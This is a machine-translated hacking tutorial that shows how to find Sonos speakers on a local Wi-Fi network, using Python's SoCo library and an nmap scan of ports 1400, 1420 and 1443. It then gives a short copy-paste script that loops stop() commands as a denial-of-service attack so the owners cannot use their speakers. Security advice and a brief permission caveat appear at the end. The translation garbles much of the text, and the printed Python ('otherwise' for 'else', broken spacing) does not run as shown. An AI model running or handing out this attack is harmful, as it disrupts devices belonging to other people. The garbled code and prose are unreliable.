Many popular IoT devices have terrible security. For example, a hacker on the same Wi-Fi network as a Sonos speaker can take direct control over the device's behavior. If an IoT device does not secure the messages used to control the network over a network, it is easy for someone to write a few Python scripts to do what they want.
Why IoT Devices Are Not Always Safe
Internet of Things devices are inexpensive, Internet-connected hardware components that are often the boundary between great ideas and completely unnecessary. The trend of putting a Wi-Fi card into items that are only marginally useful as it connects to the Internet means that many different manufacturers are installing their own security versions in these devices.
Many of these Wi-Fi-enabled products, such as light bulbs, thermostats and speakers, have become mainstream products that reach even the least tech savvy user. Because of the proliferation of IoT devices, manufacturers of IoT devices believe their equipment must be easy to use, which means lax safety.
The majority of IoT devices use poorly secured APIs They assume that if you are allowed to be on the same local Wi-Fi network as the device, they have permission to interact with it. Many IoT devices therefore allow anyone on the local Wi-Fi network to control them with the right commands without ever asking a user for a password or login name.
The most popular types of IoT devices include Sonos speakers, which allow anyone on the local network to connect these devices through a mobile or desktop application can control. With the widespread and easy-to-control Sonos speakers, they are a perfect example to explore how we can influence them.
Unlike mobile applications that communicate with remote servers, when you run the Sonos app on your phone or desktop, commands are sent directly to the Sonos on your home network. Because these commands can be sent by anyone, not just the Sonos app, we can execute application calls from within a Python program when we know the API used by the Sonos device.
Fortunately, hackers are unofficially aware of and documented the API for many popular IoT devices. The Sonos API has even been converted into a library for Python! The SoCo and SoCos libraries allow a Python programmer to discover and issue commands from Sonos devices on a local network, either through a command-line interface or through a Python script written in an IDE.
To show how this works, we show how to analyze how Sonos devices can be controlled to create a Denial-of-Service script for disabling Sonos systems on the network.
Designing Your Own Behavior with Python
Using the SoCo Library (Sonos Controller) for Python We can begin to examine what kind of behavior we want to create in an IoT device. While we were repeatedly able to turn the song into a classic anthem of intense sensual power, such as " Never Gonna Give You Up," this behavior would immediately distract everyone from having someone play around with the speaker. Instead, looking at the available commands, it seems as if a denial-of-service attack is trivially easy to execute.
A denial-of-service attack aims to simply break the way a device normally declines other people's ability to use it. In a Wi-Fi DoS attack, we would throw everyone out of the network repeatedly to prevent anyone from using the Internet. In this attack, we search all the Sonos devices on the network and then send them repeatedly the command "Stop play", which makes the use of the Sonos loudspeaker from the normal application impossible.
What You Need
To start, you need a Sonos device on your network that you have permission to connect to. The point of this article is that by connecting to the same network as the device, you are allowed to work on the device. Otherwise, you might get into trouble if the owner disagrees with what you are doing.
Next, you need a Python IDE to write your code. IDEs are helpful because they allow us to work on our code in an optimized environment and give us a lot of feedback about what happens to our code along the way. I recommend PyCharm, especially if you are a student, because they give students a free license for their professional product.
If you've set up PyCharm, make sure your computer has Python installed. Best to go to a terminal window, type python3 and press to return . When you receive a prompt, you have Python3, and you can begin. If you do not, you may need to download Python3 before proceeding to the official website.
If you downloaded PyCharm, open the file and follow the installation steps. If you have already set it up, just open the PyCharm application. When you open PyCharm for the first time, a screen should appear as below:
Click Create New Project and name the project If you want. Click "Create" to open a new project window.
Within the new project window, we need to create a new Python file. Right-click the project window on the left, and then select the New drop-down menu. Select "Python File" from this menu to create a blank Python file. Name it something that you will remember.
Here we go! We should now open a Python file and ready to run. To make sure your Python works, you can put in a simple script. Paste the following into the text editor, right-click in the project area, and then click Run
for i in range (20): print ("It works!")
It should produce a result like the following.
If you see the script working, you can get started How to install the SoCo library.
There are two different ways to control a Sonos device on the network. The first thing we'll investigate is SoCos, the command-line version of SoCo. To install SoCos, go to a terminal window and type:
pip install socos
This should install the command-line version of Socos. To use it, execute socos in your terminal window. If you are in tool soc enter help to see what is available.
help Available commands: * list List of available devices * party mode Place all speakers in the same group, a.k.a Party Mode. * info Information about a speaker * play Begin to play * Break break * Stop stop * next Play the next song * previous Plays the previous song * Mode Change or display the playback mode of a device * current Displays the current title Queue Displays the current queue * remove Remove track from queue to index * volume Change or view the volume of a device * bass Changes or displays the bass value of a device * Heights Change or display the altitude of a device * state Gets the current status of a device / group * keeps track of the public convenience method for `_search_and_play` * Albums Public convenience method for `_search_and_play` * artists Public Convenience Method for `_search_and_play` * playlists Public convenience method for `_search_and_play` * sonos_playlists Public convenience method for `_search_and_play` * exit socos Set the current shell session speaker to IP or speaker * unset Resets the current spokesperson for the shell session * help Print List of Brief Description Commands
Above, we can see that we have commands to search, play, pause, and perform a variety of other useful things from the command line on the network. If you just want to control your Sonos from the command line, you can play with SoCos here for a while before proceeding.
For our purposes we will install SoCo in PyCharm We can start with scripting behavior instead of relying on a prompt.
In PyCharm you will find the "Terminal" icon at the bottom of the window. Click on it and a terminal prompt will appear at the bottom of your PyCharm screen, allowing you to install libraries for PyCharm.
When this window is open, you can enter pip install soco to install the SoCo library in PyCharm. You can enter the same command in a system-terminal window to install the library in your system as a whole.
pip install soco Requirement already met: soco in /Users/skickar/venv/lib/python3.6/site-packages Requirement already met: xmltodict in /Users/skickar/venv/lib/python3.6/site-packages (from soco) Requirement already met: Requirements in /Users/skickar/venv/lib/python3.6/site-packages (from soco) Requirement already met: idna <2.8,> = 2.5 in /Users/skickar/venv/lib/python3.6/site-packages (from soco) Requirement already met: urllib3 <1.24,> = 1.21.1 in /Users/skickar/venv/lib/python3.6/site-packages (from soco) Requirement already met: certifi> = 2017.4.17 in /Users/skickar/venv/lib/python3.6/site-packages (from soco) Requirement already met: chardet <3.1.0,> = 3.0.2 in /Users/skickar/venv/lib/python3.6/site-packages (from soco) You are using Pip version 9.0.1, but version 18.1 is available You should upgrade using the command & #; pip install --upgrade pip & # 39;
. Once PyCharm has confirmed the installation of SoCo, you can write our first script for Sonos!
Step 4: Find a device on the network
After setting up SoCo in PyCharm, we write the first part of our script. For information on how SoCo can interact with Sonos speakers, see the project's documentation page .
The documentation includes some commands for discovering Sonos devices on the network. Most useful is to grab all Sonos devices with the function soco.discover () . The function sets the information required to control the Sonos device to a variable called "devices"
>>> import soco >>> devices = soco.discover () >>> devices Set (SoCo ("192.168.0.10"), SoCo ("192.168.0.30"), SoCo ("192.168.0.17")) >>> device = devices.pop () >>> device SoCo ("192.168.0.16")
Now that we can address all Sonos devices on the network, we're trying an API call.
Next, we want to & # 39; I'll actually get the Sonos device to do something with our Python code. Let PyCharm get all the Sonos devices found to do something. In terms of documentation, there are several possibilities:
The normal play, pause, and stop functionality is provided with similarly named methods (play (), pause (), and stop ()) in the SoCo instance and current status is contained in the output of get_current_transport_info ():
For our purposes we use the function stop () . By repeating this feature, which targets all detected Sonos devices, we essentially create a denial-of-service attack.
Now create our Python code. We need to import the SoCo library. Next we need to detect all the Sonos devices on the network and put them in a variable called "device"
import soco device = soco.discovery.any_soco ()
Next, we need to test if we got a result, and use a while loop to define what to do. We will check if the variable "device" contains something. If so, we send the command stop . When it's empty, we say "No device found."
while len (str (device))! = 0: print ("Denial of service attack in progress on:", device) device.stop () otherwise: print ("No device found.")
This simple code should do everything we need. Next, just test it and see if we can connect and control a Sonos device. Here are the 7 lines that you can easily copy and paste.
import soco device = soco.discovery.any_soco () while len (str (device))! = 0: print ("Denial of service attack in progress on:", device) device.stop () otherwise: print ("No device found.")
Step 7: Find Sonos devices with open ports
If you want to find a Sonos device outside of SoCos, you can do a map scan using the following ports to start the search network. Sonos devices have ports 1400, 1420, and 1443 open. To recognize them, we are looking for them.
You need to determine the IP address range for your network that you can use with your IP Address and type in after the ipcalc command in a terminal window.
ipcalc 172.16.42.61 Address: 172.16.42.61 10101100.00010000.00101010. 00111101 Netmask: 255.255.255.0 = 24 11111111.11111111.11111111. 00000000 Wildcard: 0.0.0.255 00000000.00000000.00000000. 11111111 => Network: 172.16.42.0/24 10101100.00010000.00101010. 00000000 HostMin: 172.16.42.1 10101100.00010000.00101010. 00000001 HostMax: 172.16.42.254 10101100.00010000.00101010. 11111110 Shipment: 172.16.42.255 10101100.00010000.00101010. 11111111 Hosts / Net: 254 Class B, Private Internet
If you know your network realm, you can run the following command to search for Sonos devices on the same network:
nmap -p 1400, 1420, 1443 172.16. 42.0 / 24
If you see devices that say that these ports are open, you should be able to proceed to the next step. While there are many devices with open ports from different manufacturers, you can reduce the results to Sonos devices with the grep command. Make sure that Sonos is capitalized because it is probably listed on the scan.
nmap -p 1400, 1420, 1443 172.16.42.0/24 | grep & # 39; Sonos & # 39; MAC Address: 94: 9F: 3E: f $: 04: 3C (Sonos) MAC address: 94: 9F: 3E: F5: 96: 0A (Sonos)
Back in PyCharm, it's time to try out our Python script. Press the green play button in the top menu to run our Python script. If nothing happens, right-click on the project window, select "Run" and then the name of your project. Sometimes PyCharm tries to do the wrong project, so make sure it's the right one.
If the script succeeds, you should immediately stop playing music and issue an output like the one below, which will change the IP address of the affected Sonos IoT device. Indicates device.
Other users can no longer control the device from their mobile phones or desktop apps due to the intensity of the stop commands sent to the device. Until you stop the loop, the unit stops playing and makes the Sonos useless. This type of attack can be changed to perform any desired creative action, such as changing the song when a particular device joins the network.
It's Important to Remember IoT devices are increasingly designed for comfort, not security. This can be frustrating for anyone who wants to keep their devices safe, but there are some ways to take device safety into their own hands.
Be careful who grants you access to your Wi-Fi network. This gives you access to all devices on your network, some of which may not have the best security setting. You should never set up IoT devices in an open network.
Instead, you should set up a guest network that does not allow connection between devices. Restricting guests to their own subnet on a Wi-Fi network prevents them from communicating with other elements on the network. The problem of guests interacting with the Sonos via Wi-Fi is thus excluded.
In general, you should be careful when connecting. Connect new devices to a network before you know how they work. Since most IoT devices do not scrutinize who controls them, they are often the target of malware and other types of abuse. You can do your part by connecting IoT devices so that random outsiders can not configure or access them.
I hope you liked this guide to controlling IoT devices with Python API calls! If you have questions about this IoT security tutorial or have a comment, please contact Twitter or contact Twitter @KodyKinzie .